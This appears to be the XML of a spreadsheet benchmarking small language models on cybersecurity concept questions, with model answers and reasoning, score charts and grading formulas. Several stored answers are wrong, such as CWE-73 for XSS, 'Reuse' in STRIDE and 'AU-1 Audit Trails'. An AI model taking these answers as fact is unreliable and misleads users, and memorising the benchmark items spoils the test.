Then, incident 2 is a social media company with a data breach exposing users' messages. The relevant regulation here might be the General Data Protection Regulation (GDPR). GDPR is about data protection and privacy, so if a company is exposing users' personal data, GDPR would apply. But I need to make sure. The GDPR applies to any organization that processes personal data, regardless of the sector. So the social media company, being a data processor, would be under GDPR. 
Wait, but the user is asking which regulation is primary for each. So for the power grid attack, the NIS Directive is the primary one. For the data breach, GDPR is the primary one. But I should confirm if there are any other regulations. For example, the Cybersecurity Act might also apply, but the NIS Directive is more specific to critical infrastructure. So yeah, NIS for the first and GDPR for the second.
&lt;/think&gt;
**Incident 1 (Power Grid Operator Cyberattack):**  
The primary concern is the **Network and Information Security (NIS) Directive** (EU Regulation (EU) 2016/1148). This directive mandates safeguards for operators of critical infrastructure (e.g., power grids) and requires prompt reporting of incidents to the relevant authorities.  
**Incident 2 (Social Media Data Breach):**  
The primary concern is the **General Data Protection Regulation (GDPR)** (EU Regulation (EU) 2016/679). GDPR applies to organizations processing personal data, requiring them to report data breaches to supervisory authorities and ensure user privacy.  
**Key distinction:**  
- The NIS Directive focuses on **cybersecurity risk management** for critical infrastructure.  
- The GDPR focuses on **data protection and privacy** for personal data breaches.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's see. The question is about which principle of the CIA triad a cloud storage service using checksums like SHA-256 is upholding. The CIA triad stands for Confidentiality, Integrity, and Availability.
So, the cloud service is using checksums to verify that files haven't been altered. That seems to relate to Integrity. Because checksums ensure that the data remains the same as it was originally uploaded. If someone tries to change the data, the checksum would change, so they can detect corruption or tampering. That's about maintaining the integrity of the data.
Confidentiality would be about keeping the data secret, but the question here is about preventing unauthorized changes, not about keeping it secret. Availability is about ensuring the data is accessible when needed. The checksums here are more about ensuring the data hasn't been altered, so it's Integrity.
So the answer should be Integrity. The principle being upheld is the Integrity principle.
&lt;/think&gt;
The principle being upheld is **Integrity**. The use of checksums (like SHA-256) ensures that files remain unaltered and accurate, preventing unauthorized changes or corruption.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking me to analyze the statement "The system must enforce multi-factor authentication (MFA) for all administrative access." They want to know what type of statement this is in cybersecurity and its primary purpose.
First, I need to recall the different types of cybersecurity statements. There's policy, procedure, standard, and requirement. The statement here is a requirement because it's a mandatory instruction. It's not a policy because that's more about overarching guidelines. It's not a procedure, which would be the steps to do something. A standard would be a general guideline, but this is more specific. So, requirement makes sense.
Now, the primary purpose. MFA is a security measure to prevent unauthorized access. By enforcing MFA for administrative access, the system is ensuring that only authorized users can access critical systems. This reduces the risk of password-based attacks, such as phishing or brute force. Administrative access is typically the most sensitive, so MFA here is to protect against unauthorized access attempts. The purpose is to strengthen authentication and secure administrative privileges.
I should make sure I'm not mixing up terms. A requirement is a specific, enforceable statement that must be followed. The purpose is to enhance security by requiring multiple authentication factors, thereby mitigating the risk of unauthorized access. That's the key point here.
&lt;/think&gt;
The statement is a **security requirement** in cybersecurity. Its primary purpose is to **enhance access control** by ensuring that administrative access is protected through multi-factor authentication (MFA), thereby reducing the risk of unauthorized access, credential theft, or privilege escalation attacks.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the NIST Cybersecurity Framework and which two core functions are demonstrated when a company activates their incident response plan and restores systems from backups after a ransomware attack.
First, I need to recall the NIST CSF's core functions. The framework has five core functions: Identify, Protect, Detect, Respond, and Recover. 
The question mentions activating the incident response plan and restoring from backups. Incident response is part of the Respond function. Restoring systems from backups would be part of the Recover function. 
Wait, let me make sure. The Respond function includes actions to contain the incident, mitigate damage, and begin recovery. The Recover function is about restoring systems and services. So, restoring from backups is definitely part of Recover. 
But the activation of the incident response plan is part of the Respond function. So the two core functions here would be Respond and Recover. 
I should check if there's any other possible functions. Detect is about identifying the incident, but the question says they already activated the plan and started restoring, so Detect might not be the main one here. Protect is about preventing incidents, but the question is about responding and recovering. 
So the answer should be Respond and Recover.
&lt;/think&gt;
The two core functions demonstrated are **Respond** and **Recover**.  
- **Respond** involves activating the incident response plan to contain the attack.  
- **Recover** includes restoring systems from backups to resume operations.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a security policy that requires all actions by privileged users to be recorded in immutable, time-stamped log files. They want to know which NIST SP 800-53 control family this falls under.
First, I need to recall the NIST SP 800-53 control families. The main ones are IA (Information Assurance), AC (Access Control), and maybe others like PA (Privacy), but the question is about logging and immutability. 
Looking at NIST SP 800-53, the control families include things like authentication, authorization, audit, and more. The specific control that deals with logging and ensuring logs are not altered is probably under the Audit family. 
Wait, in NIST SP 800-53, the Audit control family is responsible for ensuring that system activities are logged and that these logs are protected. The requirement for immutable logs would be part of that. Also, the control number might be AU-1, which is about audit trails. 
But I should verify. The AU family includes controls for audit trails, which require that all system activities be logged, and that logs are protected from tampering. So the answer is the Audit (AU) control family. 
Alternatively, maybe it's under the Security (S) family, but no, the Security family is more about access control and protection. The Audit family is specifically for logging and monitoring. So the correct answer is Audit (AU).
&lt;/think&gt;
The requirement is addressed under the **Audit (AU)** control family in NIST SP 800-53. Specifically, **AU-1** (Audit Trails) ensures that all system activities, including privileged user actions, are logged with time stamps and protected to prevent tampering.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a web application vulnerability where user input is directly rendered without sanitization, leading to malicious script execution. The example given is a script tag that steals cookies. I need to identify the common name for this vulnerability and its CWE identifier.
First, I remember that this scenario is a classic case of Cross-Site Scripting (XSS). The attacker injects malicious scripts into a web page that is then rendered to other users. The key here is that the input isn't sanitized, so the browser executes the script.
Now, the CWE identifier. I think CWE-73 is the one related to XSS. Let me verify that. Yes, CWE-73 is "Cross-Site Scripting," which is the common weakness name. The corresponding identifier is CWE-73. 
So the answer should be that the vulnerability is Cross-Site Scripting (XSS) with CWE-73. I need to make sure there's no confusion with other similar terms like CSRF, but in this case, it's definitely XSS. The attacker's script is executed in the context of the victim's browser, leading to potential cookie theft, which is a common exploit in XSS.
&lt;/think&gt;
The vulnerability is **Cross-Site Scripting (XSS)**, with the corresponding **CWE identifier** **CWE-73**. This occurs when untrusted user input is rendered without proper sanitization, allowing attackers to inject malicious scripts (e.g., stealing cookies) into the browser context of unsuspecting users.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a threat in the STRIDE model. The scenario is an unauthorized user intercepting and altering data packets between a client and server, changing a financial transaction. Let me recall the STRIDE categories.
STRIDE stands for Spoofing, Tampering, Reuse, Information Disclosure, Denial, and Elevation. The threat here involves changing data in transit. Tampering is about altering data, so that's probably the right category. But wait, let me make sure. Spoofing is about impersonating someone, like fake addresses. Tampering is changing data, like modifying content. Reuse is using something again, like a password. So yes, altering the transaction amount would be Tampering. The user might be a security professional doing threat modeling, so they need to categorize this correctly. They might also be confused between Spoofing and Tampering, so I should clarify that. The answer is Tampering.
&lt;/think&gt;
In the STRIDE threat model, this threat belongs to the **Tampering** category. Tampering involves unauthorized modification of data in transit, which directly aligns with an attacker altering the amount of a financial transaction.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about two different cybersecurity incidents in the EU and which regulation applies to each. Let me break this down.
First, the power grid operator incident. Disrupting electricity distribution is a critical infrastructure issue. The EU has regulations for critical infrastructure, like the NIS Directive. That's the Network and Information Security Directive, which requires operators of essential services to have security measures in place. So for the power grid, NIS is the main concern.
Then the social media data breach. That's about personal data exposure. The GDPR is the primary regulation here. GDPR covers data protection and privacy, so a breach exposing messages would fall under it. The company would need to report it and take steps to mitigate the damage.
Wait, but I should check if there's any other regulation. For critical infrastructure, there's also the NIS2, which is an updated version. But the question says "primary concern," so NIS2 might be more relevant now. However, the original NIS Directive is still in effect. Maybe the user is referring to the general NIS regulation. Also, the social media company is probably under GDPR, but maybe the Digital Services Act (DSA) if they're handling online services. But the breach is about data, so GDPR is more direct. The DSA is more about content and services, not data breaches. So I think GDPR is correct for the second case.
So the answer is NIS for the power grid and GDPR for the social media breach.
&lt;/think&gt;
1. **Power grid incident**: Primary concern is the **Network and Information Security (NIS) Directive** (or NIS2, which extends its scope to critical infrastructure). This regulation mandates security measures for essential services like energy, ensuring resilience against cyber threats.  
2. **Social media data breach**: Primary concern is the **General Data Protection Regulation (GDPR)**. This regulation governs the protection of personal data, requiring organizations to report breaches affecting millions of users.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the CIA triad and which principle is being upheld by using data checksums like SHA-256 in a cloud storage service. Let me recall the CIA triad: Confidentiality, Integrity, and Availability.
Checksums are used to ensure that data hasn't been altered or corrupted during transfer. So, that's about making sure the data is the same as when it was originally uploaded. That sounds like Integrity. Because Integrity is about ensuring data is accurate and trustworthy, without unauthorized changes. 
Wait, but sometimes people might confuse confidentiality with integrity. But confidentiality is about keeping data secret, not about ensuring it's not changed. So the checksums here are verifying that the data hasn't been altered, which is definitely Integrity. 
Let me double-check. If the data is corrupted during transfer, the checksum would detect that, so it's ensuring the data's integrity. So the answer should be Integrity. I think that's right. The user might be testing if I can distinguish between the three principles correctly.
&lt;/think&gt;
The principle of the CIA triad being upheld by data checksums (e.g., SHA-256) is **Integrity**. Checksums ensure data remains unaltered or corrupted during transmission, verifying its accuracy and reliability.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the statement regarding enforcing MFA for administrative access. Let me break this down. First, I need to identify what type of statement this is. In cybersecurity, there are different types of statements like policies, procedures, controls, etc. 
The statement is about a requirement that must be followed. It's not just a guideline but a mandatory action. So this sounds like a security policy. Policies are high-level statements that outline what needs to be done to ensure security. 
Now, the primary purpose of this statement. The main goal here is to enhance security by requiring MFA. MFA adds an extra layer of protection, making it harder for attackers to gain unauthorized access. Since it's for administrative access, which is often a high-value target, this policy aims to reduce the risk of breaches. 
I should also consider if there's another possible classification. Maybe it's a control? But controls are more about the specific actions taken, like MFA itself. However, the statement is about enforcing a control through a policy. So the primary purpose is to mandate the use of MFA as a security measure. 
Wait, the question is asking for the type of statement and its primary purpose. So the type is a security policy, and the purpose is to enforce MFA to protect administrative access. That makes sense. I need to make sure I'm not mixing up policies with procedures. Procedures are more detailed steps on how to do something, whereas policies are the rules. 
Yes, this statement is a policy because it's a rule that must be followed. The purpose is to ensure that MFA is used, thereby improving security. That's the answer.
&lt;/think&gt;
This statement is a **security policy**. Its primary purpose is to **mandate the use of multi-factor authentication (MFA)** for administrative access, thereby **reducing the risk of unauthorized access** and enhancing the overall security posture by enforcing a critical control measure.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the NIST Cybersecurity Framework and which two core functions are demonstrated when a company responds to a ransomware attack by containing damage and restoring from backups. Let me recall the NIST CSF core functions.
The framework has five core functions: Identify, Protect, Detect, Respond, and Recover. The question mentions actions taken during an incident response plan. Containing damage and restoring systems would fall under the Respond and Recover functions. 
Wait, let me make sure. The Respond function includes actions to contain the incident, mitigate impact, and manage the response. Recover involves restoring systems and data, and ensuring business continuity. So both Respond and Recover are involved here. 
I need to confirm that these are the two most prominent. The user is looking for two functions, so the answer should be Respond and Recover. I should check if there's any overlap with other functions, but I think that's correct. Yeah, that's it.
&lt;/think&gt;
The two core functions most prominently demonstrated are **Respond** and **Recover**.  
- **Respond** involves containing the incident and mitigating its impact.  
- **Recover** focuses on restoring systems, data, and operations from backups to resume normal functions.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a security policy that requires all actions by privileged users to be recorded in immutable, time-stamped logs. They want to know which control family in NIST SP 800-53 covers this.
First, I remember that NIST 800-53 has several control families. The main ones are Access Control, Audit and Accountability, Configuration Management, etc. The requirement here is about logging and ensuring logs can't be altered. That sounds like it's related to auditing. 
Wait, the Audit and Accountability family deals with logging and monitoring. Controls like AU-2 and AU-6 are about maintaining logs and ensuring they are protected. Immutable logs would fall under protecting the integrity of audit logs. So the answer should be Audit and Accountability. Let me double-check. Yes, AU-2 requires that audit logs are protected against unauthorized modification, and AU-6 covers the retention and protection of logs. So the correct control family is Audit and Accountability.
&lt;/think&gt;
The requirement is addressed by the **Audit and Accountability (AU)** control family in NIST SP 800-53. Specifically, controls like **AU-2** (protecting audit logs from unauthorized modification) and **AU-6** (ensuring logs are retained and protected) enforce immutability, time-stamping, and integrity of privileged user actions.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about a web application vulnerability where user input is rendered directly without sanitization. The attacker's comment includes a script that steals cookies. Let me recall the common names for such vulnerabilities.
First, when user input is directly executed in the browser, that's usually a script injection. The most common name for this is Cross-Site Scripting, or XSS. Now, what's the CWE identifier for that? I think CWE-79 is the one for XSS. Let me double-check. Yes, CWE-79 is Cross-Site Scripting, which involves injecting malicious scripts into web pages viewed by other users. The example given here is a classic XSS attack where the script steals cookies by redirecting the user's browser to an attacker's site. So the answer should be XSS and CWE-79.
&lt;/think&gt;
The vulnerability is **Cross-Site Scripting (XSS)**, and its corresponding CWE identifier is **CWE-79**. This occurs when untrusted data is rendered without proper sanitization, allowing attackers to inject malicious scripts (e.g., stealing cookies).</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let me try to figure this out. The user is asking about a threat in the STRIDE model. The scenario is about an unauthorized user intercepting and altering data packets between a client and server, specifically changing a financial transaction amount.
First, I need to recall what STRIDE stands for. STRIDE is a threat modeling framework with six categories: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. 
The threat here involves altering data packets. Tampering refers to the unauthorized modification of data. So if someone is changing the transaction amount, that's tampering. Let me check if there's another category that could fit. Spoofing is about impersonation, which isn't the case here. Repudiation is about denying actions, which isn't the issue. Information disclosure is about leaking data, which isn't happening here. Denial of Service is about disrupting service, which isn't the case. Elevation of Privilege is about gaining higher access, which also doesn't fit. 
Therefore, the correct category should be Tampering. I think that's it. Let me make sure there's no other possible angle. The key point is the alteration of data in transit, which directly aligns with Tampering in STRIDE.
&lt;/think&gt;
This threat falls under the **Tampering** category in the STRIDE model. Tampering involves unauthorized modification of data, such as altering transaction amounts during transmission.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, let's tackle this question. The user is asking about two security incidents in the EU and which regulations apply to each. First, I need to recall the main cybersecurity regulations in the EU.
The first incident is a cyberattack on a power grid operator disrupting electricity distribution. That sounds like a critical infrastructure issue. I remember that the EU has the NIS Directive, which stands for Network and Information Security. It's aimed at ensuring a high level of security for network and information systems, especially those that are essential for the economy and society. The NIS Directive applies to operators of essential services, which would include energy providers like power grid operators. So incident 1 is likely under NIS Directive.
The second incident is a data breach at a social media company exposing personal messages. This seems more related to data protection. The GDPR, or General Data Protection Regulation, is the primary regulation for data privacy in the EU. GDPR applies to any organization processing personal data of EU citizens, regardless of where the company is based. Social media companies handling user data would fall under GDPR. So incident 2 is under GDPR.
Wait, but I should double-check if there's any overlap. For example, could the data breach also be covered under NIS? Probably not, because NIS is more about security of critical infrastructure, while GDPR is about data protection. The data breach here is about personal data exposure, which is GDPR's main concern. 
Also, the NIS Directive requires certain security measures and incident reporting, but the specific data protection aspects are handled by GDPR. So the primary regulation for incident 1 is NIS Directive, and for incident 2, it's GDPR. That makes sense. I think that's the correct answer.
&lt;/think&gt;
**Incident 1 (power grid cyberattack):** Primary concern is the **NIS Directive** (Network and Information Security), which governs critical infrastructure security.  
**Incident 2 (data breach of personal messages):** Primary concern is the **GDPR** (General Data Protection Regulation), which addresses data privacy and breach notification.</t>
  </si>
  <si>
    <t>&lt;think&gt;
Okay, the user is asking about the CIA triad and which principle is being upheld by using data checksums like SHA-256 in a cloud storage service. Let me recall the CIA triad: Confidentiality, Integrity, and Availability.
Data checksums are used to verify that files haven't been altered or corrupted during transfer. So, if the checksum matches, the data is intact. That sounds like it's about ensuring the data remains unchanged, which relates to Integrity. 
Wait, but sometimes people might confuse this with Availability. No, Availability is about ensuring the system is operational and accessible. Integrity is specifically about the accuracy and completeness of data. 
So the answer should be Integrity. Let me make sure there's no trick here. The question mentions verifying files aren't altered or corrupted, which directly ties to maintaining data integrity. Yes, that's correct.
&lt;/think&gt;
The principle of the CIA triad primarily upheld by data checksums (like SHA-256) is **Integrity**. This ensures data remains unaltered and accurate during transmission or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</si>
</sst>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Calibri"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="0"/>
      <name val="Calibri"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <name val="Calibri"/>
      <family val="2"/>
    </font>
    <font>
      <sz val="12"/>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vertical="center" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
      <alignment horizontal="left" vertical="center" wrapText="1"/>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120">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0D68-4148-B229-CD7B31B4E40A}"/>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Summary!$R$2:$R$26</c:f>
              <c:strCache>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>deepseek-r1:1.5b</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>qwen2.5:0.5b</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>llama3.2:1b</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>gemma3:1b</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>qwen2.5:3b</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>qwen3:0.6b</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>lily_cyber:latest</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>qwen2.5:1.5b</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>deepseek-r1:7b</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>gemma3:4b</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>granite3-dense:2b</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>granite3.2:2b</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>gemma3n:e2b</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>phi4-mini-reasoning:3.8b</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>qwen3:1.7b</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>llama3:8b</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>phi3:3.8b</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>phi4-mini:3.8b</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>llama3.2:3b</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>mistral:7b</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>qwen2.5:7b</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>granite3-dense:8b</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>granite3.2:8b</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>qwen3:4b</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>qwen3:8b</c:v>
                </c:pt>
              </c:strCache>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>Summary!$S$2:$S$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>8</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>14</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Dashboard!$AC$22:$AC$45</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>3</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Dashboard!$AD$22:$AD$45</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>0</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Dashboard!$AE$22:$AE$45</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="24"/>
                <c:pt idx="0">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>4</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6">
  <autoFilter ref="A1:M26"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
  <sheetViews>
    <sheetView tabSelected="1" zoomScale="89" workbookViewId="0">
      <selection activeCell="I6" sqref="I6"/>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 min="18" max="18" width="23.33203125" bestFit="1"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7" t="s">
        <v>0</v>
      </c>
      <c r="Q1" s="8" t="s">
        <v>8</v>
      </c>
      <c r="R1" s="7" t="s">
        <v>0</v>
      </c>
      <c r="S1" s="8" t="s">
        <v>8</v>
      </c>
    </row>
    <row r="2" spans="1:19" ht="15" thickTop="1" x14ac:dyDescent="0.3">
      <c r="A2" s="3" t="s">
        <v>13</v>
      </c>
      <c r="B2" s="3" t="s">
        <v>12</v>
      </c>
      <c r="C2" s="3" t="s">
        <v>12</v>
      </c>
      <c r="D2" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E2" s="4" t="s">
        <v>12</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G2" s="3" t="s">
        <v>12</v>
      </c>
      <c r="H2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I2" s="3">
        <f>COUNTIF(B2:H2,"Correct")*2 + COUNTIF(B2:H2,"Incomplete")*1</f>
        <v>2</v>
      </c>
      <c r="J2" s="5">
        <f t="shared" ref="J2:J26" si="0">IF(COUNTA(B2:H2)&gt;0, K2/COUNTA(B2:H2), 0)</f>
        <v>0.14285714285714285</v>
      </c>
      <c r="K2" s="3">
        <f t="shared" ref="K2:K26" si="1">COUNTIF(B2:H2, "Correct")</f>
        <v>1</v>
      </c>
      <c r="L2" s="3">
        <f t="shared" ref="L2:L26" si="2">COUNTIF(B2:H2, "Incomplete")</f>
        <v>0</v>
      </c>
      <c r="M2" s="3">
        <f t="shared" ref="M2:M26" si="3">COUNTIF(B2:H2, "Incorrect")</f>
        <v>6</v>
      </c>
      <c r="P2" s="9" t="s">
        <v>13</v>
      </c>
      <c r="Q2" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>2</v>
      </c>
      <c r="R2" t="str" cm="1">
        <f t="array" ref="R2:S26">_xlfn._xlws.SORT(P2:Q26,2,1)</f>
        <v>deepseek-r1:1.5b</v>
      </c>
      <c r="S2">
        <v>2</v>
      </c>
    </row>
    <row r="3" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="B3" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C3" s="3" t="s">
        <v>11</v>
      </c>
      <c r="D3" s="4" t="s">
        <v>12</v>
      </c>
      <c r="E3" s="4" t="s">
        <v>11</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>12</v>
      </c>
      <c r="G3" s="3" t="s">
        <v>10</v>
      </c>
      <c r="H3" s="3" t="s">
        <v>10</v>
      </c>
      <c r="I3" s="3">
        <f t="shared" ref="I3:I26" si="4">COUNTIF(B3:H3,"Correct")*2 + COUNTIF(B3:H3,"Incomplete")*1</f>
        <v>8</v>
      </c>
      <c r="J3" s="5">
        <f t="shared" si="0"/>
        <v>0.42857142857142855</v>
      </c>
      <c r="K3" s="3">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="L3" s="3">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="M3" s="3">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
      <c r="P3" s="9" t="s">
        <v>14</v>
      </c>
      <c r="Q3" s="11">
        <f>SummaryTable[[#This Row],[Score]]</f>
        <v>8</v>
      </c>
      <c r="R3" t="str">
        <v>qwen2.5:0.5b</v>
      </c>
      <c r="S3">
        <v>3</v>
      </c>
    </row>
    <row r="4" spans="1:19" x14ac:dyDescent="0.3">
      <c r="A4" s="3" t="s">
        <v>15</v>
      </c>
      <c r="B4" s="3" t="s">
        <v>10</v>
      </c>
      <c r="C4" s="3" t="s">
        <v>10</v>
      </c>
      <c r="D4" s="4" t="s">
        <v>12</v>
      </c>
